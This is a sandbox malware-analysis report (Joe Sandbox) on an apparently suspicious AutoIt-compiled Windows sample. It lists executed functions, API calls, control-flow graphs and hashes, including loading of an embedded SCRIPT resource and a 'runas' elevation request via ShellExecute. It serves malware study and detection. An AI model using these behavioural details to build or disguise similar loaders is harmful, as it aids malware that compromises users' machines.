98475 70d260 256 API calls 2 library calls 98439->98475 98442 70dd7a 98442->98420 98443 752f75 98443->98443 98445 70e010 98444->98445 98463 70e0dc messages 98445->98463 98479 720242 5 API calls __Init_thread_wait 98445->98479 98448 752fca 98450 70a961 22 API calls 98448->98450 98448->98463 98449 70a961 22 API calls 98449->98463 98452 752fe4 98450->98452 98480 7200a3 29 API calls __onexit 98452->98480 98455 752fee 98481 7201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98455->98481 98458 77359c 82 API calls 98458->98463 98460 70ec40 256 API calls 98460->98463 98461 70a8c7 22 API calls 98461->98463 98462 7104f0 22 API calls 98462->98463 98463->98449 98463->98458 98463->98460 98463->98461 98463->98462 98464 70e3e1 98463->98464 98477 70a81b 41 API calls 98463->98477 98478 71a308 256 API calls 98463->98478 98482 720242 5 API calls __Init_thread_wait 98463->98482 98483 7200a3 29 API calls __onexit 98463->98483 98484 7201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98463->98484 98485 7847d4 256 API calls 98463->98485 98486 7868c1 256 API calls 98463->98486 98464->98420 98467->98420 98468->98420 98469->98420 98470->98420 98471->98420 98472->98429 98473->98429 98474->98429 98475->98442 98476->98443 98477->98463 98478->98463 98479->98448 98480->98455 98481->98463 98482->98463 98483->98463 98484->98463 98485->98463 98486->98463 98487 701cad SystemParametersInfoW

                          Executed Functions

                          Function 007042DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 245 7042de-70434d call 70a961 GetVersionExW call 706b57 250 743617-74362a 245->250 251 704353 245->251 253 74362b-74362f 250->253 252 704355-704357 251->252 254 743656 252->254 255 70435d-7043bc call 7093b2 call 7037a0 252->255 256 743631 253->256 257 743632-74363e 253->257 261 74365d-743660 254->261 274 7043c2-7043c4 255->274 275 7437df-7437e6 255->275 256->257 257->253 258 743640-743642 257->258 258->252 260 743648-74364f 258->260 260->250 263 743651 260->263 264 743666-7436a8 261->264 265 70441b-704435 GetCurrentProcess IsWow64Process 261->265 263->254 264->265 269 7436ae-7436b1 264->269 267 704494-70449a 265->267 268 704437 265->268 271 70443d-704449 267->271 268->271 272 7436b3-7436bd 269->272 273 7436db-7436e5 269->273 276 743824-743828 GetSystemInfo 271->276 277 70444f-70445e LoadLibraryA 271->277 278 7436bf-7436c5 272->278 279 7436ca-7436d6 272->279 281 7436e7-7436f3 273->281 282 7436f8-743702 273->282 274->261 280 7043ca-7043dd 274->280 283 743806-743809 275->283 284 7437e8 275->284 287 704460-70446e GetProcAddress 277->287 288 70449c-7044a6 GetSystemInfo 277->288 278->265 279->265 289 743726-74372f 280->289 290 7043e3-7043e5 280->290 281->265 292 743704-743710 282->292 293 743715-743721 282->293 285 7437f4-7437fc 283->285 286 74380b-74381a 283->286 291 7437ee 284->291 285->283 286->291 296 74381c-743822 286->296 287->288 297 704470-704474 GetNativeSystemInfo 287->297 298 704476-704478 288->298 294 743731-743737 289->294 295 74373c-743748 289->295 299 74374d-743762 290->299 300 7043eb-7043ee 290->300 291->285 292->265 293->265 294->265 295->265 296->285 297->298 303 704481-704493 298->303 304 70447a-70447b FreeLibrary 298->304 301 743764-74376a 299->301 302 74376f-74377b 299->302 305 7043f4-70440f 300->305 306 743791-743794 300->306 301->265 302->265 304->303 307 743780-74378c 305->307 308 704415 305->308 306->265 309 74379a-7437c1 306->309 307->265 308->265 310 7437c3-7437c9 309->310 311 7437ce-7437da 309->311 310->265 311->265
                          APIs
                          • GetVersionExW.KERNEL32(?), ref: 0070430D
                            • Part of subcall function 00706B57: _wcslen.LIBCMT ref: 00706B6A
                          • GetCurrentProcess.KERNEL32(?,0079CB64,00000000,?,?), ref: 00704422
                          • IsWow64Process.KERNEL32(00000000,?,?), ref: 00704429
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00704454
                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00704466
                          • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00704474
                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 0070447B
                          • GetSystemInfo.KERNEL32(?,?,?), ref: 007044A0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                          • String ID: GetNativeSystemInfo$kernel32.dll$|O
                          • API String ID: 3290436268-3101561225
                          • Opcode ID: f79586b71dc1b5c502b7ca076a20587634b89a00823c0439d0e7c38f2c9a5bc0
                          • Instruction ID: 1ba8edc32495ae1932a08227b69b63547d38cc6de3133663d0d9cf5cdc4304ee
                          • Opcode Fuzzy Hash: f79586b71dc1b5c502b7ca076a20587634b89a00823c0439d0e7c38f2c9a5bc0
                          • Instruction Fuzzy Hash: 94A196A190B3C0FFCB12C769BD811957FF5AB26340B98D59BE18593B62D23C4505CB2E
                          Function 007042A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1365 7042a2-7042ba CreateStreamOnHGlobal 1366 7042da-7042dd 1365->1366 1367 7042bc-7042d3 FindResourceExW 1365->1367 1368 7042d9 1367->1368 1369 7435ba-7435c9 LoadResource 1367->1369 1368->1366 1369->1368 1370 7435cf-7435dd SizeofResource 1369->1370 1370->1368 1371 7435e3-7435ee LockResource 1370->1371 1371->1368 1372 7435f4-743612 1371->1372 1372->1368
                          APIs
                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,007050AA,?,?,00000000,00000000), ref: 007042B2
                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,007050AA,?,?,00000000,00000000), ref: 007042C9
                          • LoadResource.KERNEL32(?,00000000,?,?,007050AA,?,?,00000000,00000000,?,?,?,?,?,?,00704F20), ref: 007435BE
                          • SizeofResource.KERNEL32(?,00000000,?,?,007050AA,?,?,00000000,00000000,?,?,?,?,?,?,00704F20), ref: 007435D3
                          • LockResource.KERNEL32(007050AA,?,?,007050AA,?,?,00000000,00000000,?,?,?,?,?,?,00704F20,?), ref: 007435E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                          • String ID: SCRIPT
                          • API String ID: 3051347437-3967369404
                          • Opcode ID: ac0b549b148f11757cb6b4b96f9f4c3b36635e77498994ac614e1a6a249d7538
                          • Instruction ID: 599e75663fc5a70eab8b69dcf99917400b7ef431546d65845ddad17ccdf96237
                          • Opcode Fuzzy Hash: ac0b549b148f11757cb6b4b96f9f4c3b36635e77498994ac614e1a6a249d7538
                          • Instruction Fuzzy Hash: 71117CB1200700FFDF228B65DC49F277BB9FBC5B51F10826AB502D6290DB75D8018630
                          Function 00742BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00702B6B
                            • Part of subcall function 00703A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,007D1418,?,00702E7F,?,?,?,00000000), ref: 00703A78
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                          • GetForegroundWindow.USER32(runas,?,?,?,?,?,007C2224), ref: 00742C10
                          • ShellExecuteW.SHELL32(00000000,?,?,007C2224), ref: 00742C17
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                          • String ID: runas
                          • API String ID: 448630720-4000483414
                          • Opcode ID: f5c92c82a0dd9c5ff8c8f537ac3e83f094fde0010a7e392d051062c0ac6dd3c1
                          • Instruction ID: 7a303786c9c27f9841ab62adc2cb0fe7734565264fc0b9abf49d0073d2f18e08
                          • Opcode Fuzzy Hash: f5c92c82a0dd9c5ff8c8f537ac3e83f094fde0010a7e392d051062c0ac6dd3c1
                          • Instruction Fuzzy Hash: 0F11B472208381EAC714FF60D89EA7EB7E89B91340F84562EF146521E3DF2D994AC712
                          Function 0076DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenW.KERNEL32(?,00745222), ref: 0076DBCE
                          • GetFileAttributesW.KERNELBASE(?), ref: 0076DBDD
                          • FindFirstFileW.KERNELBASE(?,?), ref: 0076DBEE
                          • FindClose.KERNEL32(00000000), ref: 0076DBFA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: FileFind$AttributesCloseFirstlstrlen
                          • String ID:
                          • API String ID: 2695905019-0
                          • Opcode ID: 34bd34cb432a12316e8f779c23cbad8631aa0c8496fac84019faeaa36b4114b3
                          • Instruction ID: d422385cfe6318e49c92ddcc0bca7532cf51438032b10b0e5ac425e928baefaa
                          • Opcode Fuzzy Hash: 34bd34cb432a12316e8f779c23cbad8631aa0c8496fac84019faeaa36b4114b3
                          • Instruction Fuzzy Hash: 72F0A0308209185BD631AB78AC0D8AA377CAF01334F508703F836C20E0EBB95D9686E9
                          Function 0070D730 Relevance: 21.6, APIs: 14, Instructions: 631sleepsynchronizationtimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetInputState.USER32 ref: 0070D807
                          • timeGetTime.WINMM ref: 0070DA07
                          • Sleep.KERNEL32(0000000A), ref: 0070DBB1
                          • Sleep.KERNEL32(0000000A), ref: 00752B76
                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00752C11
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00752C29
                          • CloseHandle.KERNEL32(?), ref: 00752C3D
                          • Sleep.KERNEL32(?,CCCCCCCC,00000000), ref: 00752CA9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Sleep$CloseCodeExitHandleInputObjectProcessSingleStateTimeWaittime
                          • String ID:
                          • API String ID: 388478766-0
                          • Opcode ID: 16b5e07c6128a9fca3310891210ce806d06097f90a4bc19506949ba19d1ef639
                          • Instruction ID: 3de5b6d4c5d0d6a194d319e3ea2d74eee41c36e1060d5d10468091a0ee5ea82e
                          • Opcode Fuzzy Hash: 16b5e07c6128a9fca3310891210ce806d06097f90a4bc19506949ba19d1ef639
                          • Instruction Fuzzy Hash: BF42DF70604341EFD739CF64C848BAAB7E1BF86311F54861AE855872D2D7BCAC49CB92
                          Function 00702CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • GetSysColorBrush.USER32(0000000F), ref: 00702D07
                          • RegisterClassExW.USER32(00000030), ref: 00702D31
                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00702D42
                          • InitCommonControlsEx.COMCTL32(?), ref: 00702D5F
                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00702D6F
                          • LoadIconW.USER32(000000A9), ref: 00702D85
                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00702D94
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                          • API String ID: 2914291525-1005189915
                          • Opcode ID: dc78c59240b7bdb2d99cb9aa07ae2c7da0f7fb7dad14eaac23edebf59bfc8fce
                          • Instruction ID: 3e489d1f44f4e0a987e121135d6726ebd408b8109a05e72c3601300cf7c1daa0
                          • Opcode Fuzzy Hash: dc78c59240b7bdb2d99cb9aa07ae2c7da0f7fb7dad14eaac23edebf59bfc8fce
                          • Instruction Fuzzy Hash: 1721E3B1902248AFDF01DFA4EC59BDDBBB8FB08700F40811BF511A62A0D7B95541CFA8
                          Function 00738D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 313 738d45-738d55 314 738d57-738d6a call 72f2c6 call 72f2d9 313->314 315 738d6f-738d71 313->315 331 7390f1 314->331 317 738d77-738d7d 315->317 318 7390d9-7390e6 call 72f2c6 call 72f2d9 315->318 317->318 321 738d83-738dae 317->321 336 7390ec call 7327ec 318->336 321->318 324 738db4-738dbd 321->324 327 738dd7-738dd9 324->327 328 738dbf-738dd2 call 72f2c6 call 72f2d9 324->328 329 7390d5-7390d7 327->329 330 738ddf-738de3 327->330 328->336 335 7390f4-7390f9 329->335 330->329 334 738de9-738ded 330->334 331->335 334->328 338 738def-738e06 334->338 336->331 341 738e23-738e2c 338->341 342 738e08-738e0b 338->342 346 738e4a-738e54 341->346 347 738e2e-738e45 call 72f2c6 call 72f2d9 call 7327ec 341->347 344 738e15-738e1e 342->344 345 738e0d-738e13 342->345 348 738ebf-738ed9 344->348 345->344 345->347 350 738e56-738e58 346->350 351 738e5b-738e79 call 733820 call 7329c8 * 2 346->351 379 73900c 347->379 352 738edf-738eef 348->352 353 738fad-738fb6 call 73f89b 348->353 350->351 382 738e96-738ebc call 739424 351->382 383 738e7b-738e91 call 72f2d9 call 72f2c6 351->383 352->353 356 738ef5-738ef7 352->356 366 739029 353->366 367 738fb8-738fca 353->367 356->353 360 738efd-738f23 356->360 360->353 364 738f29-738f3c 360->364 364->353 369 738f3e-738f40 364->369 371 73902d-739045 ReadFile 366->371 367->366 372 738fcc-738fdb GetConsoleMode 367->372 369->353 374 738f42-738f6d 369->374 376 7390a1-7390ac GetLastError 371->376 377 739047-73904d 371->377 372->366 378 738fdd-738fe1 372->378 374->353 381 738f6f-738f82 374->381 384 7390c5-7390c8 376->384 385 7390ae-7390c0 call 72f2d9 call 72f2c6 376->385 377->376 386 73904f 377->386 378->371 387 738fe3-738ffd ReadConsoleW 378->387 380 73900f-739019 call 7329c8 379->380 380->335 381->353 393 738f84-738f86 381->393 382->348 383->379 390 739005-73900b call 72f2a3 384->390 391 7390ce-7390d0 384->391 385->379 397 739052-739064 386->397 388 738fff GetLastError 387->388 389 73901e-739027 387->389 388->390 389->397 390->379 391->380 393->353 400 738f88-738fa8 393->400 397->380 404 739066-73906a 397->404 400->353 408 739083-73908e 404->408 409 73906c-73907c call 738a61 404->409 411 739090 call 738bb1 408->411 412 73909a-73909f call 7388a1 408->412 418 73907f-739081 409->418 419 739095-739098 411->419 412->419 418->380 419->418
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID: .r
                          • API String ID: 0-397233886
                          • Opcode ID: 2ca0a767030ac3231e6f8209e74b2fbdc42a82379da40d9e5422bbaed7f4787e
                          • Instruction ID: 692916969912b000616d9d3dd1027c5642aba0b4fdf7ee25fd58b7e65c4dc2c7
                          • Opcode Fuzzy Hash: 2ca0a767030ac3231e6f8209e74b2fbdc42a82379da40d9e5422bbaed7f4787e
                          • Instruction Fuzzy Hash: 6CC1F075A0434AEFEB159FA8D844BADBBB0BF09310F144099F554AB393C77C9941CB62
                          Function 0074065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 421 74065b-74068b call 74042f 424 7406a6-7406b2 call 735221 421->424 425 74068d-740698 call 72f2c6 421->425 430 7406b4-7406c9 call 72f2c6 call 72f2d9 424->430 431 7406cb-740714 call 74039a 424->431 432 74069a-7406a1 call 72f2d9 425->432 430->432 440 740716-74071f 431->440 441 740781-74078a GetFileType 431->441 442 74097d-740983 432->442 446 740756-74077c GetLastError call 72f2a3 440->446 447 740721-740725 440->447 443 7407d3-7407d6 441->443 444 74078c-7407bd GetLastError call 72f2a3 CloseHandle 441->444 449 7407df-7407e5 443->449 450 7407d8-7407dd 443->450 444->432 458 7407c3-7407ce call 72f2d9 444->458 446->432 447->446 451 740727-740754 call 74039a 447->451 455 7407e9-740837 call 73516a 449->455 456 7407e7 449->456 450->455 451->441 451->446 464 740847-74086b call 74014d 455->464 465 740839-740845 call 7405ab 455->465 456->455 458->432 471 74086d 464->471 472 74087e-7408c1 464->472 465->464 470 74086f-740879 call 7386ae 465->470 470->442 471->470 474 7408e2-7408f0 472->474 475 7408c3-7408c7 472->475 478 7408f6-7408fa 474->478 479 74097b 474->479 475->474 477 7408c9-7408dd 475->477 477->474 478->479 480 7408fc-74092f CloseHandle call 74039a 478->480 479->442 483 740931-74095d GetLastError call 72f2a3 call 735333 480->483 484 740963-740977 480->484 483->484 484->479
                          APIs
                            • Part of subcall function 0074039A: CreateFileW.KERNELBASE(00000000,00000000,?,00740704,?,?,00000000,?,00740704,00000000,0000000C), ref: 007403B7
                          • GetLastError.KERNEL32 ref: 0074076F
                          • __dosmaperr.LIBCMT ref: 00740776
                          • GetFileType.KERNELBASE(00000000), ref: 00740782
                          • GetLastError.KERNEL32 ref: 0074078C
                          • __dosmaperr.LIBCMT ref: 00740795
                          • CloseHandle.KERNEL32(00000000), ref: 007407B5
                          • CloseHandle.KERNEL32(?), ref: 007408FF
                          • GetLastError.KERNEL32 ref: 00740931
                          • __dosmaperr.LIBCMT ref: 00740938
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                          • String ID: H
                          • API String ID: 4237864984-2852464175
                          • Opcode ID: 04efdc1fd6e3efa1f4bdf91f4e7743e5a00efaaf3c92d4282d5840723de1852d
                          • Instruction ID: 0af0ad0515d27515a00041bfc374052d2c8895a88b266e2067257e2f11f99890
                          • Opcode Fuzzy Hash: 04efdc1fd6e3efa1f4bdf91f4e7743e5a00efaaf3c92d4282d5840723de1852d
                          • Instruction Fuzzy Hash: B9A12632A04118CFDF19AF78D855BAE7BB0EB06320F24415EF9159B292D7399D12CBD2
                          Function 0070344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00703A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,007D1418,?,00702E7F,?,?,?,00000000), ref: 00703A78
                            • Part of subcall function 00703357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00703379
                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0070356A
                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0074318D
                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 007431CE
                          • RegCloseKey.ADVAPI32(?), ref: 00743210
                          • _wcslen.LIBCMT ref: 00743277
                          • _wcslen.LIBCMT ref: 00743286
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                          • API String ID: 98802146-2727554177
                          • Opcode ID: 3baae5f98198f770e19fd81e1da833698502b9c871e203ad7f619884ba8ce6bb
                          • Instruction ID: 9da94b0131ce0503e3500214857364d531172c3f5f02bb83b9c3cbb5f4386c8d
                          • Opcode Fuzzy Hash: 3baae5f98198f770e19fd81e1da833698502b9c871e203ad7f619884ba8ce6bb
                          • Instruction Fuzzy Hash: 31718D71505301EEC704EF29EC8585BBBF8BF94340F40852EF545831A2EB7C9A4ACB65
                          Function 00702B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • GetSysColorBrush.USER32(0000000F), ref: 00702B8E
                          • LoadCursorW.USER32(00000000,00007F00), ref: 00702B9D
                          • LoadIconW.USER32(00000063), ref: 00702BB3
                          • LoadIconW.USER32(000000A4), ref: 00702BC5
                          • LoadIconW.USER32(000000A2), ref: 00702BD7
                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00702BEF
                          • RegisterClassExW.USER32(?), ref: 00702C40
                            • Part of subcall function 00702CD4: GetSysColorBrush.USER32(0000000F), ref: 00702D07
                            • Part of subcall function 00702CD4: RegisterClassExW.USER32(00000030), ref: 00702D31
                            • Part of subcall function 00702CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00702D42
                            • Part of subcall function 00702CD4: InitCommonControlsEx.COMCTL32(?), ref: 00702D5F
                            • Part of subcall function 00702CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00702D6F
                            • Part of subcall function 00702CD4: LoadIconW.USER32(000000A9), ref: 00702D85
                            • Part of subcall function 00702CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00702D94
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                          • String ID: #$0$AutoIt v3
                          • API String ID: 423443420-4155596026
                          • Opcode ID: 802da96c233ebd5e6d15b2b1336f535374189c33e425b472ba8d0039e314626d
                          • Instruction ID: 413df99bf573e4344f6ec95b8858ec5d5fcde52eceb32d0ba899cdbec52bbf17
                          • Opcode Fuzzy Hash: 802da96c233ebd5e6d15b2b1336f535374189c33e425b472ba8d0039e314626d
                          • Instruction Fuzzy Hash: 22214C70E02318BBDB119FE5EC59A9D7FB4FB08B50F80812BE500A66A0D3B90540CF98
                          Function 0070B710 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON
                          Download Yara Rule
                          APIs
                          • __Init_thread_footer.LIBCMT ref: 0070BB4E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
